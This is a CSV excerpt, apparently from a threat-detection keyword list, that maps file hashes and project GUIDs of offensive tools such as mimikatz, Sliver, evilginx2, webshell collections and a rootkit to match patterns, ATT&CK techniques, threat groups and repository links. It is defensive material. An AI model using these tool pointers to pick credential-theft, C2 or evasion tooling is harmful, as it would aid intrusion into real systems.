RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31279" 
"*93ba29924f9e4124a73302d5ec2da5f7891922d9420cb0ca8649b6e7a9e59894*",".{0,1000}93ba29924f9e4124a73302d5ec2da5f7891922d9420cb0ca8649b6e7a9e59894.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31280" "*93ba29924f9e4124a73302d5ec2da5f7891922d9420cb0ca8649b6e7a9e59894*",".{0,1000}93ba29924f9e4124a73302d5ec2da5f7891922d9420cb0ca8649b6e7a9e59894.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - 
Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31281" "*93bd4c92a4470333efab88a00bfec4c3fc64318fc8ce0ffb9187ea54a9acf243*",".{0,1000}93bd4c92a4470333efab88a00bfec4c3fc64318fc8ce0ffb9187ea54a9acf243.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31282" "*93c574a4f1608cb5ecf7173e42d35c5a670c58c635e6a90252cd9a102d24e260*",".{0,1000}93c574a4f1608cb5ecf7173e42d35c5a670c58c635e6a90252cd9a102d24e260.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31284" 
"*93cbbd682b981bee01388710acf813b64db918b54b61039d3fe1e019dad077df*",".{0,1000}93cbbd682b981bee01388710acf813b64db918b54b61039d3fe1e019dad077df.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","31286" "*93d0d9ef1c1e2828b282ece1f3ce06624f1a27fca3d4a78e36fcaf672cf9c5b5*",".{0,1000}93d0d9ef1c1e2828b282ece1f3ce06624f1a27fca3d4a78e36fcaf672cf9c5b5.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","31287" "*93d1405dfa8765ab3ec43d1912e65ae89b8b8d06ddbc570f8cae0ca46dbf5007*",".{0,1000}93d1405dfa8765ab3ec43d1912e65ae89b8b8d06ddbc570f8cae0ca46dbf5007.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31288" "*93d8276129ccc984a4063772029e8db9002dfd82028c24864b5767cd6c7ce17d*",".{0,1000}93d8276129ccc984a4063772029e8db9002dfd82028c24864b5767cd6c7ce17d.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","31289" "*93df885410ce2b2ea1428127077bcf574e56838ce8ccf4ea410a1f120544f9b8*",".{0,1000}93df885410ce2b2ea1428127077bcf574e56838ce8ccf4ea410a1f120544f9b8.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#filehash #linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","31290" "*93e193e3081c5ac744e40c81c32992ef449c855752d8b10f6483a969950572a4*",".{0,1000}93e193e3081c5ac744e40c81c32992ef449c855752d8b10f6483a969950572a4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 
- TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31291" "*93eabc4b534f92a5532322bbcc461a04abbb0c32c3c4957c258fd77f451e3b52*",".{0,1000}93eabc4b534f92a5532322bbcc461a04abbb0c32c3c4957c258fd77f451e3b52.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","31292" "*93f5019c2c7b3a946f3a137fa1754576400c126f24b424076c9801e8f67441fd*",".{0,1000}93f5019c2c7b3a946f3a137fa1754576400c126f24b424076c9801e8f67441fd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31293" "*9402ba2248837d50c00f4a423ab23b384fa81b30e6a6cafb86e9cd73a643daeb*",".{0,1000}9402ba2248837d50c00f4a423ab23b384fa81b30e6a6cafb86e9cd73a643daeb.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31296" "*9404a903396f378796bc906ecab923f471cd6228c646cd13afe55948c414a4b2*",".{0,1000}9404a903396f378796bc906ecab923f471cd6228c646cd13afe55948c414a4b2.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","31297" "*940B1177-2B8C-48A2-A8E7-BF4E8E80C60F*",".{0,1000}940B1177\-2B8C\-48A2\-A8E7\-BF4E8E80C60F.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","#GUIDproject","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","31298" "*9413f823738aee4917952e60bfeccae88c8d103829a9831f912aa87c6535577c*",".{0,1000}9413f823738aee4917952e60bfeccae88c8d103829a9831f912aa87c6535577c.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","31301" "*941adac8fd267646f962656ab473a044dde64d49a1f7cca2914eb8e70dccd5a1*",".{0,1000}941adac8fd267646f962656ab473a044dde64d49a1f7cca2914eb8e70dccd5a1.{0,1000}","offensive_tool_keyword","POC","CVE-2024-4367 poc exploitation","T1566","TA0042","N/A","N/A","Resource 
Development","https://github.com/rzte/pdf-exploit","1","0","#filehash","N/A","6","3","216","41","2024-07-19T03:04:41Z","2024-07-11T14:33:11Z","31304" "*941adac8fd267646f962656ab473a044dde64d49a1f7cca2914eb8e70dccd5a1*",".{0,1000}941adac8fd267646f962656ab473a044dde64d49a1f7cca2914eb8e70dccd5a1.{0,1000}","offensive_tool_keyword","POC","CVE-2024-4367 poc exploitation","T1566","TA0042","N/A","N/A","Resource Development","https://github.com/rzte/pdf-exploit","1","0","#filehash","N/A","6","3","216","41","2024-07-19T03:04:41Z","2024-07-11T14:33:11Z","31305" "*941e4b332bf0cbb3573b3936b114a41f1d416bb96ba13c333f6269074a8ae7f6*",".{0,1000}941e4b332bf0cbb3573b3936b114a41f1d416bb96ba13c333f6269074a8ae7f6.{0,1000}","offensive_tool_keyword","OperaPassView","OperaPassView is a small password recovery tool that decrypts the content of the Opera Web browser password file (wand.dat) and displays the list of all Web site passwords stored in this file","T1003 - T1555 - T1145","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/opera_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","31306" "*9421b13f1c89ded77d1964b6e7032e300360063fc9d79b4afd432533038725d4*",".{0,1000}9421b13f1c89ded77d1964b6e7032e300360063fc9d79b4afd432533038725d4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31307" "*942c4cbca688c82a6a6fad58d9b55ac261a8b73b74fc5e0484a86a1e7f8dca35*",".{0,1000}942c4cbca688c82a6a6fad58d9b55ac261a8b73b74fc5e0484a86a1e7f8dca35.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31310" "*942eae7c332725392d235bb8d9e958f77e7d7b0374b2bd4e82d985a33204c176*",".{0,1000}942eae7c332725392d235bb8d9e958f77e7d7b0374b2bd4e82d985a33204c176.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31311" "*9434E131-51CD-4FC6-9105-D73734DC5BA6*",".{0,1000}9434E131\-51CD\-4FC6\-9105\-D73734DC5BA6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31312" "*9437e734cd6f37285d60b1d1c33de982d032cd7dea8a0349354c296e9ba46fbc*",".{0,1000}9437e734cd6f37285d60b1d1c33de982d032cd7dea8a0349354c296e9ba46fbc.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","31313" "*9440cc0475d27f1b73944b69fc843ef2ef2e8fc407d1400502c49ee20291121b*",".{0,1000}9440cc0475d27f1b73944b69fc843ef2ef2e8fc407d1400502c49ee20291121b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31314" "*94519aa5c41e7294ffc95b621e39097172fd0eeb9287d8678346fb80898516c3*",".{0,1000}94519aa5c41e7294ffc95b621e39097172fd0eeb9287d8678346fb80898516c3.{0,1000}","offensive_tool_keyword","Invoke-DNSteal","DNS Data Exfiltrator","T1071.004 - T1041 - T1048","TA0011 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/JoelGMSec/Invoke-DNSteal","1","0","#filehash","N/A","10","2","109","23","2023-07-17T11:26:19Z","2021-06-24T11:03:09Z","31315" 
"*945dbfc7f7e3ba9e88aa677f30fd6fe9e266e7e88a2e5d4af03ee30b6fb3a5cd*",".{0,1000}945dbfc7f7e3ba9e88aa677f30fd6fe9e266e7e88a2e5d4af03ee30b6fb3a5cd.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31317" "*945efb5ef7d46cf1e4f5383fb158ea5cd63d42214ea44abd73592f6ceeb6cf33*",".{0,1000}945efb5ef7d46cf1e4f5383fb158ea5cd63d42214ea44abd73592f6ceeb6cf33.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","31318" "*946619C2-5959-4C0C-BC7C-1C27D825B042*",".{0,1000}946619C2\-5959\-4C0C\-BC7C\-1C27D825B042.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#GUIDproject","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","31319" "*9466c85da5aa10d936e24ed74979d26231633e2d449386c4164bbcc4bbc313aa*",".{0,1000}9466c85da5aa10d936e24ed74979d26231633e2d449386c4164bbcc4bbc313aa.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31320" "*946D24E4-201B-4D51-AF9A-3190266E0E1B*",".{0,1000}946D24E4\-201B\-4D51\-AF9A\-3190266E0E1B.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","#GUIDproject","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","31322" "*946f91872edc2694cd84df5a147df89583d29ed991e8e80de8ee219ea7635528*",".{0,1000}946f91872edc2694cd84df5a147df89583d29ed991e8e80de8ee219ea7635528.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31323" 
"*94795fd89366e01bd6ce6471ff27c3782e2e16377a848426cf0b2e6baee9449b*",".{0,1000}94795fd89366e01bd6ce6471ff27c3782e2e16377a848426cf0b2e6baee9449b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31325" "*94795fd89366e01bd6ce6471ff27c3782e2e16377a848426cf0b2e6baee9449b*",".{0,1000}94795fd89366e01bd6ce6471ff27c3782e2e16377a848426cf0b2e6baee9449b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - 
Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31326" "*947d0aebbfdfa05a00d1cf8e087b2f93a411bac74e125da4abfaa2e6ad3f8826*",".{0,1000}947d0aebbfdfa05a00d1cf8e087b2f93a411bac74e125da4abfaa2e6ad3f8826.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31327" "*9484ea212c59a9ada48f9f08204448eaf013891b7b722f9d111f4346f7f17a4c*",".{0,1000}9484ea212c59a9ada48f9f08204448eaf013891b7b722f9d111f4346f7f17a4c.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31328" "*94862eccf19a77022f230e9e6817b4b20f55c1e5e86d3a910595ec7235a2846d*",".{0,1000}94862eccf19a77022f230e9e6817b4b20f55c1e5e86d3a910595ec7235a2846d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31329" "*948f609d447e622613e2b02500ec333867849aee711dcb146be75ddee92dd02e*",".{0,1000}948f609d447e622613e2b02500ec333867849aee711dcb146be75ddee92dd02e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31330" "*94a12554419e378df4acc76c0725d141738ecf1f991c74445d1e23c655278747*",".{0,1000}94a12554419e378df4acc76c0725d141738ecf1f991c74445d1e23c655278747.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31332" "*94aaedf468e4187388ab53a01bfdd820a47ebc3a78e2404285c040ccfea9161f*",".{0,1000}94aaedf468e4187388ab53a01bfdd820a47ebc3a78e2404285c040ccfea9161f.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","31334" "*94AEDCE4-D4A2-45DB-B98E-860EE6BE8385*",".{0,1000}94AEDCE4\-D4A2\-45DB\-B98E\-860EE6BE8385.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","31336" 
